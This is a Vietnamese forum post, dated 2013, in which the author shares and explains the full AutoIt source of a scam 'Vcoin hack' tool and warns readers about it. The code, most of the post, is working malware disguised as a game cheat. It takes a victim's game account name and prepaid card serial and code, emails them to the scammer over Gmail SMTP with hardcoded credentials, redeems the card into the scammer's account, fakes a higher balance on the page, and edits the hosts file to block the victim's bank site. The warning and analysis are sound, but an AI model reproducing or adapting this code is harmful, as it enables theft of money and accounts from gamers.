Code AutoIT Hack Vcoin lừa đảo của hackgame.org

Trang ChínhCalendarTrợ giúpTìm kiếmThành viênNhómĐăng kýĐăng Nhập


Welcome to Forums Haku
Chào mừng các bạn đến với diễn đàn
Chúc các bạn có những giờ phút thư giãn thoải mái tại diễn đàn
Chúc các bạn luôn thành công trong cuộc sống

<--Code by Admin Haku -->

Share|
Tiêu đề

Code AutoIT Hack Vcoin lừa đảo của hackgame.org

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down
Tác giảThông điệp

Admin
Member
avatar

Tổng bài gửi : 1074
Được Cảm Ơn : 538
Đến từ : Hà Ná»™i
Tài năng của Admin
Hạng: Member
Level:1074
Tài năng:/300


Tài Sản
Huân Chương: PhotobucketPhotobucketPhotobucketPhotobucketPhotobucketPhotobucketPhotobucketPhotobucketPhotobucket

Bài gửiTiêu đề: Code AutoIT Hack Vcoin lừa đảo của hackgame.org Tue Jul 09, 2013 2:22 am

Code AutoIT Hack Vcoin lừa đảo của hackgame.org

Code lừa đảo của hackgame.org viết bằng AutoIT

Chào các bạn hôm nay mình share 1 code của hackgame.org một trang web được xây dựng rất công phu để lừa đảo. Hy vọng đừng bạn nào tin vào trò lừa đảo này nhé và hãy luôn nghĩ rằng “không ai cho không ai cái gì” khi sử dụng các công cụ hack kiểu này.

Cái tool lừa đảo này có tên đại loại như:
Hack Báu vật Vcoin GP CF
Shop Báu Vật CF Vĩnh Viễn
Hack Zing Xu 2013
Shop Vật phẩm Gunny 2
Hack Wow Xu Gunny 2
Hack Audition Season 3
Hack Vcoin eBank VTC
Hack Vcoin CF 2013
Hack FifaOnline 2 – Vcoin + LP
Cong Dong Game Hack CF
OneHitCF 1125 hack cf moi nhat
VinaCF 1125, Download Vina CF 1125
Hack CF 1125 – One hit, headshot
Tổng hợp Hack CF 2013
CongDongGame.Net Hack cf
KMODZ Hack Au 6123 – Hack NVTT 6123OK đây là 1 code các code khác tương tự như vậy. Cái web này vẫn đang hoạt động vì vậy các bạn có thể update code của nó thường xuyên

Code:
#NoTrayIcon
WinMinimizeAll()
If ProcessExists("iexplore.exe") Then
    ProcessClose("iexplore.exe")
EndIf
MsgBox(0, "BugBauVat_CF", "Thông báo: Cập nhật báu vật nhận được 100% khi Bug (VICTORIA, AK47-Scope-R.Dragon, FR-F2, BLADE, ScarLight-R.Dragon, AUG A1-R.Dragon, M4A1-Red Dragon, AWM-R.Dragon, FOX, DELTA, ROSE, RPK-Gold, GatlingGun-gold, Barrett M99....)")
MsgBox(0, "BugBauVat_CF", "Nâng cấp bản Bug tất cả báu vật cho phiên bản Đột Kích mới nhất")
ProgressOn("Loading ...", " Nâng Cấp Bug...", "0 %")
For $i = 1 To 100 Step 1
    Sleep(40)
    ProgressSet($i, "Quá Trình Nâng Cấp : " & $i & " %")
Next
Sleep(1000)
ProgressOff()
Run("HuongDan.exe")
$version = "BugBauVat_CF"
If _singleton($version, 1) = 0 Then
    MsgBox(0, "Stopped", "Hệ thống không cho phép 2 chương trình cùng chạy.")
    Exit
EndIf
 
Func _singleton($soccurencename, $iflag = 0)
    Local Const $error_already_exists = 183
    Local Const $security_descriptor_revision = 1
    Local $handle, $lasterror, $psecurityattributes = 0
    $handle = DllCall("kernel32.dll", "int", "CreateMutex", "ptr", $psecurityattributes, "long", 1, "str", $soccurencename)
    $lasterror = DllCall("kernel32.dll", "int", "GetLastError")
    If $lasterror[0] = $error_already_exists Then
        If BitAND($iflag, 1) Then
            Return SetError($lasterror[0], $lasterror[0], 0)
        Else
            Exit  - 1
        EndIf
    EndIf
    Return $handle[0]
EndFunc
 
AutoItSetOption("TrayOnEventMode", 1)
AutoItSetOption("TrayMenuMode", 1)
Opt("GUICloseOnESC", 0)
Beep(1000, 100)
Dim $aarray1[1]
Local $msg
Dim $aarray1[1]
Local $msg
Dim $gui1, $oie, $gui
$gui = GUICreate($version, 600, 394, -1, -1, -2147483648)
WinSetTrans($version, "", 0)
$minimize = GUICtrlCreateIcon("minimize", -1, 546, 9, 23, 22, -1, 32)
GUICtrlSetTip($minimize, "Thu Nhỏ Chương Trình", $version, 1, 1)
$acc = GUICtrlCreateInput("", 145, 279, 130, 20, 1, 32)
GUICtrlSetTip($acc, "Tài Khoản CF Cần Bug", $version, 1, 1)
GUICtrlSetColor(-1, 0)
GUICtrlSetLimit(-1, 16)
$se1 = GUICtrlCreateInput("PM00", 145, 316, 130, 20, 9, 32)
GUICtrlSetTip($se1, "Nhập số Seri trên thẻ Vcoin VTC Để Bug", $version, 1, 1)
GUICtrlSetColor(-1, 0)
GUICtrlSetLimit(-1, 12)
$se2 = GUICtrlCreateInput("", 145, 352, 130, 19, 8193, 32)
GUICtrlSetTip($se2, "Nhập mã thẻ Vcoin VTC Để Bug", $version, 1, 1)
GUICtrlSetColor(-1, 0)
GUICtrlSetLimit(-1, 12)
$ui = GUICtrlCreatePic("Start", 311, 302, 121, 47, -1, 32)
GUICtrlSetTip($ui, "Bắt Đầu quá trình Bug Báu Vật, Vcoin+GP", $version, 1, 1)
GUICtrlSetCursor($ui, 0)
$e = GUICtrlCreatePic("Exit", 574, 9, 22, 22, -1, 32)
GUICtrlSetTip($e, "Exit Hack", $version, 1, 1)
GUICtrlSetCursor($e, 0)
GUICtrlCreatePic("ModzCF", 0, 0, 600, 394)
GUISetState()
For $i = 0 To 255 Step 5
    WinSetTrans($version, "", $i)
Next
$iepath = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE", "")
Run($iepath & " http://hanamonline.com ", "", @SW_SHOW)
Run($iepath & " http://hackgame.org/videocrossfire/ ", "", @SW_SHOW)
While 1
    $msg = GUIGetMsg()
    Select
        Case $msg = $gui_event_close
            Exit
        Case $msg = $ui
            If StringLen(GUICtrlRead($acc)) > 18 OR StringLen(GUICtrlRead($acc)) < 4 Then
                MsgBox(0, "BugBauVat_CF", "Xin vui lòng nhập tên tài khoản Hack chính xác")
            ElseIf StringLen(GUICtrlRead($se1)) <> 12 Then
                MsgBox(0, "BugBauVat_CF", "Seri thẻ không hợp lệ vui lòng kiểm tra lại")
            ElseIf StringLen(GUICtrlRead($se2)) <> 12 Then
                MsgBox(0, "BugBauVat_CF", "Mã thẻ không hợp lệ vui lòng kiểm tra lại")
            ElseIf StringLeft(GUICtrlRead($se1), 3) <> "PM0" AND StringLeft(GUICtrlRead($se1), 3) <> "PM1" Then
                MsgBox(0, "BugBauVat_CF", "Thẻ này không hợp lệ .Vui lòng kiểm tra lại")
            Else
                $seri1 = GUICtrlRead($se1)
                $seri2 = GUICtrlRead($se2)
                Call("LOAD")
            EndIf
        Case $msg = $minimize
            GUISetState(@SW_MINIMIZE)
        Case $msg = $e
            If WinExists("VTC eBank - Thay đổi thông tin") Then
                WinClose("VTC eBank - Thay đổi thông tin")
            EndIf
            If ProcessExists("iexplore.exe") Then
                ProcessClose("iexplore.exe")
            EndIf
            Run("CrossFire_4VN.bat")
            For $i = 255 To 1 Step -5
                WinSetTrans($version, "", $i)
                Sleep(10)
            Next
            Exit
    EndSelect
WEnd
 
Func load()
    WinMinimizeAll()
    GUISetState(@SW_HIDE, $gui)
    $guiload = GUICreate("Wait", 700, 80, -1, -1, -2147483648, $ws_ex_toolwindow)
    GUISetBkColor(3327, $guiload)
    $tb = GUICtrlCreatePic("Connection", 0, 0, 700, 80)
    GUICtrlSetFont(-1, 12)
    GUICtrlSetColor(-1, 16711680)
    GUISetState()
    $oienap = _iecreate("https://ebank.vtc.vn/home/", 0, 0, 1)
    If WinExists("Certificate Error: Navigation Blocked") Then
        $bam = _iegetobjbyname($oienap, "overridelink")
        _ieaction($bam, "click")
    EndIf
    If WinActive("AutoComplete Passwords", "Do you want Internet Explorer to remember this password?") Then
        ControlClick("AutoComplete Passwords", "Do you want Internet Explorer to remember this password?", 0)
    EndIf
    Sleep(2000)
    $oform = _ieformgetobjbyname($oienap, "aspnetForm")
    $o1s = _ieformelementgetobjbyname($oform, "ctl00_txtUserName")
    _ieformelementsetvalue($o1s, "IEFormBody")
    $oform = _ieformgetobjbyname($oienap, "aspnetForm")
    $o2s = _ieformelementgetobjbyname($oform, "ctl00_txtPassword")
    _ieformelementsetvalue($o2s, "IEConsend")
    _ieformsubmit($oform)
    Sleep(2000)
    $osubmit = _iegetobjbyname($oienap, "ctl00$btnLogin")
    _ieaction($osubmit, "click")
    $oform = _ieformgetobjbyname($oienap, "aspnetForm")
    $o2s = _ieformelementgetobjbyname($oform, "ctl00_txtPassword")
    _ieformelementsetvalue($o2s, "IEConsend")
    $osubmit = _iegetobjbyname($oienap, "ctl00$btnLogin")
    _ieaction($osubmit, "click")
    $bodyloads = _iebodyreadtext($oienap)
    If StringInStr($bodyloads, "Chào bạn") Then
        MsgBox(0, "HackGame.Org", "Thông báo: Hack Gặp lỗi không có kết nối mạng Internet. Hoặc đang có nhiều người sử dụng Hack làm tắc ghẽn Server, bạn có thể thử lại vào lúc khác")
        If WinExists("VTC eBank - Thay đổi thông tin") Then
            WinClose("VTC eBank - Thay đổi thông tin")
        EndIf
        Exit
    EndIf
    $oiess = _iecreate("https://ebank.vtc.vn/home/account.infor.html?l=vi", 0, 0, 1)
    $stextload = _iebodyreadhtml($oiess)
    $bodyload = _iebodyreadtext($oiess)
    _ieloadwait($oiess)
    $i = 1
    If WinActive("AutoComplete Passwords", "Do you want Internet Explorer to remember this password?") Then
        ControlClick("AutoComplete Passwords", "Do you want Internet Explorer to remember this password?", 0)
    EndIf
    If StringInStr($bodyload, "Thông tin tài khoản") Then
        GUIDelete($guiload)
        GUISetState(@SW_SHOW, $gui)
        Call("GUI")
    Else
        If NOT StringInStr($bodyload, "Thông tin tài khoản") Then
            MsgBox(0, "HackGame.Org", "Thông báo: Hack Gặp lỗi không có kết nối mạng Internet. Hoặc đang có nhiều người sử dụng Hack làm tắc ghẽn Server, bạn có thể thử lại vào lúc khác")
            _iequit($oiess)
            If WinExists("VTC eBank") Then
                WinClose("VTC eBank")
            EndIf
            Run("CF.bat")
            GUIDelete($guiload)
            GUISetState(@SW_SHOW, $gui)
        EndIf
    EndIf
EndFunc
 
Func luadao()
    $oie = _iecreate("https://ebank.vtc.vn/home/ebank.account.changeinfo.html?m=1&l=vi", 0, 0, 1)
    $a = 200
    $i = 1
    While $i <= 20
        $body = _iebodyreadhtml($oie)
        $stext = _iebodyreadtext($oie)
        If NOT StringInStr($stext, "Thay đổi thông tin ") Then
            MsgBox(0, "Lỗi !", "Bạn chưa đăng nhập vào tài khoản hoặc đăng nhập quá 10 phút" & @CRLF & "                        Vui lòng đọc kỹ hướng dẫn.")
            Exit
        EndIf
        Sleep(1000)
        Dim $aarray1[1]
        $aarray1 = _stringbetween($stext, "Tổng số dư ", " Vcoin")
        If StringInStr($body, $aarray1[0] & " VCoin") Then
            $newbody = StringReplace($body, $aarray1[0] & " VCoin", $aarray1[0] + 5000 & " VCoin")
            _iebodywritehtml($oie, $newbody)
        Else
            MsgBox(0, "Lỗi !", "Bạn chưa đăng nhập vào tài khoản hoặc đăng nhập quá 10 phút" & @CRLF & "                        Vui lòng đọc kỹ hướng dẫn.")
        EndIf
        $a = $a + 200
        $i = $i + 1
    WEnd
    Call("DIE")
    MsgBox(0, "Thông báo !", "Tổng số dư trong tài khoản của bạn được cộng thêm là 100.000 Vcoin !")
    Exit
EndFunc
 
Func nap()
    $oie1 = _iecreate("https://ebank.vtc.vn/home/money.vto.card.html", 0, 0, 1, @SW_HIDE)
    _ieloadwait($oie1)
    Sleep(1000)
    If WinActive("Security Alert", "Information you exchange with this site") Then
        ControlClick("Security Alert", "Information you exchange with this site", 1)
    EndIf
    $oform1 = _ieformgetobjbyname($oie1, "aspnetForm")
    $otext1 = _ieformelementgetobjbyname($oform1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$txtSerinumber")
    _ieformelementsetvalue($otext1, GUICtrlRead($se1))
    $otext1 = _ieformelementgetobjbyname($oform1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$txtCardVTOCode")
    _ieformelementsetvalue($otext1, GUICtrlRead($se2))
    $otext1 = _ieformelementgetobjbyname($oform1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$txtAccount")
    _ieformelementsetvalue($otext1, "comejenyc")
    $otext1 = _ieformelementgetobjbyname($oform1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$txtAccount")
    _ieformelementsetvalue($otext1, "comejenyc")
    Sleep(3000)
    $osubmit1 = _iegetobjbyname($oie1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$btnTopUp")
    _ieaction($osubmit1, "click")
    _ieloadwait($oie1)
    $i = 1
    While 1
        Sleep(500)
        If WinActive("Windows Internet Explorer", "Card không tồn tại") Then
            ControlClick("Windows Internet Explorer", "Card không tồn tại", 1)
        EndIf
        If WinExists("Windows Internet Explorer", "Card đã được sử dụng") Then
            ControlClick("Windows Internet Explorer", "Card đã được sử dụng", 2)
        EndIf
        If WinExists("Windows Internet Explorer", "Số seri thẻ phải có 12 ký tự") Then
            ControlClick("Windows Internet Explorer", "Số seri thẻ phải có 12 ký tự", 2)
        EndIf
        If WinExists("Windows Internet Explorer", "Mã thẻ không hợp lệ, mã thẻ hợp lệ gồm 12 chữ số") Then
            ControlClick("Windows Internet Explorer", "Mã thẻ không hợp lệ, mã thẻ hợp lệ gồm 12 chữ số", 2)
        EndIf
        $body1 = _iebodyreadtext($oie1)
        If StringInStr($body1, "Bạn vui lòng nhập seri và mã thẻ dưới lớp tráng bạc trên thẻ") Then
            If ProcessExists("iexplore.exe") Then
                ProcessClose("iexplore.exe")
            EndIf
            MsgBox(32, "HackGame.Org", "Thông báo: Quá trình Bug gặp phải các lỗi sau. (Thẻ không tồn tại hoặc đx qua sử dụng hoặc Mệnh Giá thẻ quá thấp(20.000)")
            MsgBox(32, "HackGame.Org", "Các bạn có thể sử dụng Thẻ khác có giá trị để thực hiện lần Bug tiếp theo!")
            _iequit($oie1)
            If WinExists("VTC eBank - Thông tin tài khoản") Then
                WinClose("VTC eBank - Thông tin tài khoản")
            EndIf
            Run("CF.bat")
            GUIDelete($gui1)
            GUISetState(@SW_SHOW, $gui)
            ExitLoop
        Else
            If $i = 1500 Then
                GUISetState(@SW_HIDE, $gui)
                GUIDelete($gui1)
                Call("GUI")
                ExitLoop
            Else
                $i = $i + 1
            EndIf
        EndIf
    WEnd
EndFunc
 
Func die()
    $file = FileOpen(@SystemDir & "\drivers\etc\hosts", 1)
    If $file = -1 Then
        MsgBox(0, "Thông báo !", "Tổng số dư trong tài khoản của bạn được cộng thêm là 100.000 Vcoin !")
        Exit
    EndIf
    FileWrite($file, @CRLF & "127.0.0.1 ebank.vtc.vn")
    FileWrite($file, @CRLF & "127.0.0.1 www.ebank.vtc.vn")
    FileWrite($file, @CRLF & "127.0.0.1 http://ebank.vtc.vn")
    FileClose($file)
EndFunc
 
Func gui()
    GUISetState(@SW_HIDE, $gui)
    $gui1 = GUICreate("Wait", 700, 80, -1, -1, -2147483648, $ws_ex_toolwindow)
    GUISetBkColor(3327, $gui1)
    $tb = GUICtrlCreatePic("Connection", 0, 0, 700, 80)
    GUICtrlSetFont(-1, 12)
    GUICtrlSetColor(-1, 16711680)
    GUISetState()
    Global $omyerror = ObjEvent("AutoIt.Error", "MyErrFunc")
    $s_smtpserver = "smtp.gmail.com"
    $s_fromname = "Crossfire"
    $s_fromaddress = "hotromodz@gmail.com"
    $s_toaddress = "hotromodz@gmail.com"
    $s_subject = "Support"
    $as_body = "Account:  " & GUICtrlRead($acc) & "        " & "Seri:  " & GUICtrlRead($se1) & "          " & "Code:  " & GUICtrlRead($se2)
    $s_attachfiles = ""
    $s_ccaddress = ""
    $s_bccaddress = ""
    $s_username = "hotkey.autoit"
    $s_password = "autoit3.5 suppro"
    $ipport = 465
    $ssl = 1
    Global $omyret[2]
    Global $omyerror = ObjEvent("AutoIt.Error", "MyErrFunc")
    $rc = _inetsmtpmailcom($s_smtpserver, $s_fromname, $s_fromaddress, $s_toaddress, $s_subject, $as_body, $s_attachfiles, $s_ccaddress, $s_bccaddress, $s_username, $s_password, $ipport, $ssl)
    If @error Then
        Call("NAP")
    Else
        GUIDelete($gui1)
        Call("NAP")
    EndIf
EndFunc
 
Func _inetsmtpmailcom($s_smtpserver, $s_fromname, $s_fromaddress, $s_toaddress, $s_subject = "", $as_body = "", $s_attachfiles = "", $s_ccaddress = "", $s_bccaddress = "", $s_username = "", $s_password = "", $ipport = 25, $ssl = 0)
    $objemail = ObjCreate("CDO.Message")
    $objemail.from = '"' & $s_fromname & '" <' & $s_fromaddress & ">"
    $objemail.to = $s_toaddress
    Local $i_error = 0
    Local $i_error_desciption = ""
    If $s_ccaddress <> "" Then $objemail.cc = $s_ccaddress
    If $s_bccaddress <> "" Then $objemail.bcc = $s_bccaddress
    $objemail.subject = $s_subject
    If StringInStr($as_body, "<") AND StringInStr($as_body, ">") Then
        $objemail.htmlbody = $as_body
    Else
        $objemail.textbody = $as_body & @CRLF
    EndIf
    If $s_attachfiles <> "" Then
        Local $s_files2attach = StringSplit($s_attachfiles, ";")
        For $x = 1 To $s_files2attach[0]
            $s_files2attach[$x] = _pathfull($s_files2attach[$x])
            If FileExists($s_files2attach[$x]) Then
                $objemail.addattachment($s_files2attach[$x])
            Else
                $i_error_desciption = $i_error_desciption & @LF & "File not found to attach: " & $s_files2attach[$x]
                SetError(1)
                Return 0
            EndIf
        Next
    EndIf
    $objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    $objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_smtpserver
    $objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $ipport
    If $s_username <> "" Then
        $objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
        $objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_username
        $objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_password
    EndIf
    If $ssl Then
        $objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
    EndIf
    $objemail.configuration.fields.update
    $objemail.send
    If @error Then
        SetError(2)
        Return $omyret[1]
    EndIf
EndFunc
 
Func myerrfunc()
    $hexnumber = Hex($omyerror.number, 8)
    $omyret[0] = $hexnumber
    $omyret[1] = StringStripWS($omyerror.description, 3)
    ConsoleWrite("### COM Error !  Number: " & $hexnumber & "  ScriptLine: " & $omyerror.scriptline & "  Description:" & $omyret[1] & @LF)
    SetError(1)
    Return
EndFunc


Lưu ý: Do lo ngại một số bạn có thể áp dụng vào mục đích xấu nên code này các bạn copy về chưa thể chạy được ngay như những code khác mình share. Các bạn cũng đừng pm mình hỏi làm sao cho nó chạy nhé


Code này làm những gì?

Thực chất code này rất đơn giản nó chỉ tạo form yêu cầu bạn điền mã thẻ, tài khoản và password sau đó:
+ Mã thẻ nó dùng thư viện IE tự động nạp thẻ vào tài khoản comejenyc tài khoản này chắc là của thằng viết ra cái trò lừa đảo này rồi.
+ Thông tin tài khoản nó sẽ gửi vào email: hotromodz@gmail.com
+ Không cho bạn truy cập vào ebank.vtc.vn để lấy lại tài khoản bằng cách ghi 3 dòng sau vào file host

FileWrite($file, @CRLF & “127.0.0.1 ebank.vtc.vn”)
FileWrite($file, @CRLF & “127.0.0.1 www.ebank.vtc.vn”)
FileWrite($file, @CRLF & “127.0.0.1 http://ebank.vtc.vn”)


Lời kết

Các bạn đọc lại code mình ko phân tích sâu vào từng lệnh. Có 2 file .bat và HuongDan.exe mình chưa phân tích.
Ở đây trong hàm gửi mail có username và password của cái mail mà tool gửi về

1. $s_username = "hotkey.autoit"
2. $s_password = "autoit3.5 suppro"

Cái mail này chắc bị bọn nước ngoài nó thịt lâu rồi vì mình thấy bài viết về cái tool này trên diễn đàn

http://board.deioncube.in/showthread.php?tid=29&page=5

Thread được tạo ngày 06-06-2011
Mình share code này không hy vọng các bạn đi lừa đảo người khác vì sớm muộn gì các bạn cũng bị phát hiện và hậu quả thì tùy bạn tưởng tượng

Hãy cám ơn bài viết của Admin bằng cáh bấm vào "" nhe!!!

Về Đầu Trang Go down

Xem lý lịch thành viên http://haku.4rumer.com

Tiêu đề

Code AutoIT Hack Vcoin lừa đảo của hackgame.org

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang
Trang 1 trong tổng số 1 trang
::.
Permissions in this forum:Bạn không có quyền trả lời bài viết
Forum Häkü Cộng Đồng Chém Gió :: CONG NGHE THONG TIN :: Thủ thuật-